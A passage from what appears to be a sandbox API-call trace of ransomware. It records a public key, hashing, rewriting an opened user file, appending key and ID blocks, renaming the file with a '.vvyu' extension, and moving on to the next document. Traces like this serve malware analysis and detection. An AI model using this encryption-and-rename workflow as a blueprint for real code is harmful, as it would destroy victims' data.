KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0194.658] CryptAcquireContextW (in: phProv=0x30ffa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x30ffa50*=0x6ea788) returned 1 [0194.659] CryptCreateHash (in: hProv=0x6ea788, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x30ffa58 | out: phHash=0x30ffa58) returned 1 [0194.659] CryptHashData (hHash=0x2cbfa90, pbData=0x2d32688, dwDataLen=0x1f1, dwFlags=0x0) returned 1 [0194.659] CryptGetHashParam (in: hHash=0x2cbfa90, dwParam=0x2, pbData=0x0, pdwDataLen=0x30ffa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x30ffa54) returned 1 [0194.659] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x11) returned 0x2c44748 [0194.660] CryptGetHashParam (in: hHash=0x2cbfa90, dwParam=0x2, pbData=0x2c44748, pdwDataLen=0x30ffa54, dwFlags=0x0 | out: pbData=0x2c44748, pdwDataLen=0x30ffa54) returned 1 [0194.660] GetLastError () returned 0x0 [0194.660] CryptDestroyHash (hHash=0x2cbfa90) returned 1 [0194.660] CryptReleaseContext (hProv=0x6ea788, dwFlags=0x0) returned 1 [0194.660] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d32688 | out: hHeap=0x6a0000) returned 1 [0194.660] UuidCreate (in: Uuid=0x30ffa48 | out: Uuid=0x30ffa48) returned 0x0 [0194.660] UuidToStringA (in: Uuid=0x30ffa48, StringUuid=0x30ffa40 | out: StringUuid=0x30ffa40) returned 0x0 [0194.660] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x30) returned 0x2c84b70 [0194.660] RpcStringFreeA (in: String=0x30ffa40 | out: String=0x30ffa40) returned 0x0 [0194.660] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84c50 | out: hHeap=0x6a0000) returned 1 [0194.660] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x30) returned 0x2c84c50 [0194.660] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x14af0) returned 0x2d49778 [0194.661] SetFilePointer (in: hFile=0x574, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0194.661] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84b70 | out: hHeap=0x6a0000) returned 1 [0194.661] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1f0) returned 0x2d3f920 [0194.661] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x30) returned 0x2c84b70 [0194.661] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1f0) returned 0x2d3fb18 [0194.661] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x58) returned 0x2bf9c98 [0194.661] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2d42418 [0194.661] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d3a000 [0194.661] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2d42460 [0194.661] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d3a018 [0194.661] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d3a048 [0194.661] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d3a0a8 [0194.662] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d3a060 [0194.662] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x2cc0bc0 [0194.662] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x158) returned 0x2c84da8 [0194.662] RtlReAllocateHeap (Heap=0x6a0000, Flags=0x0, Ptr=0x2c84da8, Size=0x218) returned 0x2d3b920 [0194.662] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x558) returned 0x2d42908 [0194.662] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3a048 | out: hHeap=0x6a0000) returned 1 [0194.662] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3a060 | out: hHeap=0x6a0000) returned 1 [0194.662] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3a0a8 | out: hHeap=0x6a0000) returned 1 [0194.662] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2cc0bc0 | out: hHeap=0x6a0000) returned 1 [0194.663] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d42908 | out: hHeap=0x6a0000) returned 1 [0194.663] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d3a0a8 [0194.663] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x8) returned 0x2c37850 [0194.663] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x2d3a060 [0194.663] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x18) returned 0x2c446e8 [0194.663] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x9) returned 0x2d3a048 [0194.663] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x8) returned 0x2c37830 [0194.663] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10e) returned 0x2c70bc8 [0194.663] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27748 [0194.663] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x58) returned 0x2bf9bd8 [0194.663] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x14) returned 0x2c44748 [0194.663] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x104) returned 0x2c4bb80 [0194.663] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x14) returned 0x2c44728 [0194.663] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378c0 [0194.664] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c70bc8 | out: hHeap=0x6a0000) returned 1 [0194.664] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3a060 | out: hHeap=0x6a0000) returned 1 [0194.664] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37830 | out: hHeap=0x6a0000) returned 1 [0194.664] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3a048 | out: hHeap=0x6a0000) returned 1 [0194.664] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c446e8 | out: hHeap=0x6a0000) returned 1 [0194.664] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37850 | out: hHeap=0x6a0000) returned 1 [0194.664] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3a0a8 | out: hHeap=0x6a0000) returned 1 [0194.664] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27748 | out: hHeap=0x6a0000) returned 1 [0194.664] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2bf9c98 | out: hHeap=0x6a0000) returned 1 [0194.665] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3b920 | out: hHeap=0x6a0000) returned 1 [0194.665] GetCurrentThreadId () returned 0x264 [0194.665] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x100) returned 0x2c70bc8 [0194.665] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x82) returned 0x2d46480 [0194.665] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x2c) returned 0x2c84d30 [0194.665] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x80) returned 0x6ea788 [0194.665] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x148) returned 0x2d31688 [0194.665] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37850 [0194.665] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37830 [0194.665] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x100) returned 0x6d5c88 [0194.665] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x64) returned 0x6fab90 [0194.666] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6fab90 | out: hHeap=0x6a0000) returned 1 [0194.666] GetCurrentThreadId () returned 0x264 [0194.666] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x64) returned 0x6fab90 [0194.666] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6fab90 | out: hHeap=0x6a0000) returned 1 [0194.666] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xeb) returned 0x2be2220 [0194.666] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x64) returned 0x6fab90 [0194.666] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6fab90 | out: hHeap=0x6a0000) returned 1 [0194.666] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x64) returned 0x6fab90 [0194.667] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6fab90 | out: hHeap=0x6a0000) returned 1 [0194.667] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2be2220 | out: hHeap=0x6a0000) returned 1 [0194.667] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x100) returned 0x2be2220 [0194.667] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37850 | out: hHeap=0x6a0000) returned 1 [0194.667] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4c) returned 0x2c827f8 [0194.667] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37850 [0194.667] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x100) returned 0x74ad40 [0194.667] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37870 [0194.667] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d3a0a8 [0194.668] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37870 | out: hHeap=0x6a0000) returned 1 [0194.668] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37870 [0194.668] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378b0 [0194.668] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37890 [0194.668] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378a0 [0194.668] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37840 [0194.668] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378d0 [0194.668] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378e0 [0194.668] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d3a048 [0194.668] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378b0 | out: hHeap=0x6a0000) returned 1 [0194.668] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x8) returned 0x2c378b0 [0194.668] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37870 | out: hHeap=0x6a0000) returned 1 [0194.668] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37870 [0194.668] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37910 [0194.668] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378f0 [0194.668] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37900 [0194.668] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x2d3a060 [0194.668] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378f0 | out: hHeap=0x6a0000) returned 1 [0194.668] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x18) returned 0x2c446e8 [0194.668] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37910 | out: hHeap=0x6a0000) returned 1 [0194.668] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d3a030 [0194.668] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37900 | out: hHeap=0x6a0000) returned 1 [0194.668] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x2d3a0c0 [0194.669] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37870 | out: hHeap=0x6a0000) returned 1 [0194.669] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x8) returned 0x2c37870 [0194.669] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378d0 | out: hHeap=0x6a0000) returned 1 [0194.669] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d3a090 [0194.669] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37870 | out: hHeap=0x6a0000) returned 1 [0194.669] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d3a078 [0194.669] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37890 | out: hHeap=0x6a0000) returned 1 [0194.669] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x2d3a0d8 [0194.669] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3a078 | out: hHeap=0x6a0000) returned 1 [0194.669] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x2d3a078 [0194.669] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3a090 | out: hHeap=0x6a0000) returned 1 [0194.669] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x8) returned 0x2c37890 [0194.669] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37850 | out: hHeap=0x6a0000) returned 1 [0194.669] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x14) returned 0x2c446a8 [0194.669] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37890 | out: hHeap=0x6a0000) returned 1 [0194.669] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1c) returned 0x2d27748 [0194.669] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3a048 | out: hHeap=0x6a0000) returned 1 [0194.669] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x2d3a048 [0194.669] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378b0 | out: hHeap=0x6a0000) returned 1 [0194.669] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x204) returned 0x2d3b678 [0194.669] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3a0a8 | out: hHeap=0x6a0000) returned 1 [0194.669] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x108) returned 0x2c4bc98 [0194.670] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3a0d8 | out: hHeap=0x6a0000) returned 1 [0194.670] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x210) returned 0x2d2fc90 [0194.670] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27748 | out: hHeap=0x6a0000) returned 1 [0194.670] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10c) returned 0x2c03ca0 [0194.670] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378a0 | out: hHeap=0x6a0000) returned 1 [0194.670] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x108) returned 0x2c4bec8 [0194.670] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3a048 | out: hHeap=0x6a0000) returned 1 [0194.670] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x200) returned 0x2d2fea8 [0194.670] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4bc98 | out: hHeap=0x6a0000) returned 1 [0194.670] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x100) returned 0x2d300b0 [0194.670] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37830 | out: hHeap=0x6a0000) returned 1 [0194.671] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6ea788 | out: hHeap=0x6a0000) returned 1 [0194.671] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2be2220 | out: hHeap=0x6a0000) returned 1 [0194.671] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d300b0 | out: hHeap=0x6a0000) returned 1 [0194.671] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c446a8 | out: hHeap=0x6a0000) returned 1 [0194.672] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4bec8 | out: hHeap=0x6a0000) returned 1 [0194.672] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2fc90 | out: hHeap=0x6a0000) returned 1 [0194.673] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2fea8 | out: hHeap=0x6a0000) returned 1 [0194.673] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c03ca0 | out: hHeap=0x6a0000) returned 1 [0194.673] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37840 | out: hHeap=0x6a0000) returned 1 [0194.673] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3a078 | out: hHeap=0x6a0000) returned 1 [0194.673] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378e0 | out: hHeap=0x6a0000) returned 1 [0194.673] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3a0c0 | out: hHeap=0x6a0000) returned 1 [0194.673] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c446e8 | out: hHeap=0x6a0000) returned 1 [0194.673] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3a060 | out: hHeap=0x6a0000) returned 1 [0194.673] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3a030 | out: hHeap=0x6a0000) returned 1 [0194.674] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d31688 | out: hHeap=0x6a0000) returned 1 [0194.674] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84d30 | out: hHeap=0x6a0000) returned 1 [0194.675] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6d5c88 | out: hHeap=0x6a0000) returned 1 [0194.675] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3a018 | out: hHeap=0x6a0000) returned 1 [0194.675] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d42460 | out: hHeap=0x6a0000) returned 1 [0194.676] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3b678 | out: hHeap=0x6a0000) returned 1 [0194.676] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x74ad40 | out: hHeap=0x6a0000) returned 1 [0194.676] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c827f8 | out: hHeap=0x6a0000) returned 1 [0194.676] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4bb80 | out: hHeap=0x6a0000) returned 1 [0194.677] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c44748 | out: hHeap=0x6a0000) returned 1 [0194.677] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378c0 | out: hHeap=0x6a0000) returned 1 [0194.677] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c44728 | out: hHeap=0x6a0000) returned 1 [0194.677] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2bf9bd8 | out: hHeap=0x6a0000) returned 1 [0194.677] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3fb18 | out: hHeap=0x6a0000) returned 1 [0194.677] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84b70 | out: hHeap=0x6a0000) returned 1 [0194.677] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3f920 | out: hHeap=0x6a0000) returned 1 [0194.677] WriteFile (in: hFile=0x574, lpBuffer=0x2d49778*, nNumberOfBytesToWrite=0x14ae6, lpNumberOfBytesWritten=0x30ffb14, lpOverlapped=0x0 | out: lpBuffer=0x2d49778*, lpNumberOfBytesWritten=0x30ffb14*=0x14ae6, lpOverlapped=0x0) returned 1 [0194.679] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d49778 | out: hHeap=0x6a0000) returned 1 [0194.679] SetFilePointerEx (in: hFile=0x574, liDistanceToMove=0x14aeb, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0194.679] WriteFile (in: hFile=0x574, lpBuffer=0x2c70bc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x30ffb50, lpOverlapped=0x0 | out: lpBuffer=0x2c70bc8*, lpNumberOfBytesWritten=0x30ffb50*=0x100, lpOverlapped=0x0) returned 1 [0194.679] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c70bc8 | out: hHeap=0x6a0000) returned 1 [0194.679] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x60) returned 0x2c700d0 [0194.679] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x428) returned 0x2d2fc90 [0194.679] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt", cchWideChar=-1, lpMultiByteStr=0x2d2fc90, cbMultiByte=1064, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt", lpUsedDefaultChar=0x0) returned 41 [0194.680] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x430) returned 0x2d42908 [0194.680] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2fc90 | out: hHeap=0x6a0000) returned 1 [0194.680] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c700d0 | out: hHeap=0x6a0000) returned 1 [0194.680] WriteFile (in: hFile=0x574, lpBuffer=0x2d42908*, nNumberOfBytesToWrite=0x28, lpNumberOfBytesWritten=0x30ffb50, lpOverlapped=0x0 | out: lpBuffer=0x2d42908*, lpNumberOfBytesWritten=0x30ffb50*=0x28, lpOverlapped=0x0) returned 1 [0194.681] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d42908 | out: hHeap=0x6a0000) returned 1 [0194.681] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0194.681] WriteFile (in: hFile=0x574, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x30ffb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x30ffb50*=0x26, lpOverlapped=0x0) returned 1 [0194.681] CloseHandle (hObject=0x574) returned 1 [0194.683] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x90) returned 0x2d47b20 [0194.683] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x8a0) returned 0x2d2cc80 [0194.683] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d47b20 | out: hHeap=0x6a0000) returned 1 [0194.684] MoveFileW (lpExistingFileName="C:\\Users\\kEecfMwgj\\Documents\\AzlD\\PeBfuwtoR 4\\ivoTJ\\jnZKj8ReDOajZL.xls" (normalized: "c:\\users\\keecfmwgj\\documents\\azld\\pebfuwtor 4\\ivotj\\jnzkj8redoajzl.xls"), lpNewFileName="C:\\Users\\kEecfMwgj\\Documents\\AzlD\\PeBfuwtoR 4\\ivoTJ\\jnZKj8ReDOajZL.xls.vvyu" (normalized: "c:\\users\\keecfmwgj\\documents\\azld\\pebfuwtor 4\\ivotj\\jnzkj8redoajzl.xls.vvyu")) returned 1 [0194.697] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2cc80 | out: hHeap=0x6a0000) returned 1 [0194.697] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84c50 | out: hHeap=0x6a0000) returned 1 [0194.697] VirtualFree (lpAddress=0x2040000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0194.700] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c2d920 | out: hHeap=0x6a0000) returned 1 [0194.700] FindNextFileW (in: hFindFile=0x2cbfa50, lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd4b3dc10, ftCreationTime.dwHighDateTime=0x1d898d6, ftLastAccessTime.dwLowDateTime=0xcefb1230, ftLastAccessTime.dwHighDateTime=0x1d89e07, ftLastWriteTime.dwLowDateTime=0xcefb1230, ftLastWriteTime.dwHighDateTime=0x1d89e07, nFileSizeHigh=0x0, nFileSizeLow=0x254c, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="rU0Q9.odp", cAlternateFileName="")) returned 1 [0194.700] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x70) returned 0x2c3b7a8 [0194.700] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xa6) returned 0x2c2d920 [0194.700] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c3b7a8 | out: hHeap=0x6a0000) returned 1 [0194.700] PathFindExtensionW (pszPath="C:\\Users\\kEecfMwgj\\Documents\\AzlD\\PeBfuwtoR 4\\ivoTJ\\rU0Q9.odp") returned=".odp" [0194.700] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\Documents\\AzlD\\PeBfuwtoR 4\\ivoTJ\\rU0Q9.odp" (normalized: "c:\\users\\keecfmwgj\\documents\\azld\\pebfuwtor 4\\ivotj\\ru0q9.odp"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x574 [0194.701] GetFileSizeEx (in: hFile=0x574, lpFileSize=0x30ffb40 | out: lpFileSize=0x30ffb40*=9548) returned 1 [0194.701] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x2040000 [0194.703] SetFilePointerEx (in: hFile=0x574, liDistanceToMove=0x2526, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0194.703] ReadFile (in: hFile=0x574, lpBuffer=0x2040000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x30ffb78, lpOverlapped=0x0 | out: lpBuffer=0x2040000*, lpNumberOfBytesRead=0x30ffb78*=0x26, lpOverlapped=0x0) returned 1 [0194.705] RtlAllocateHeap 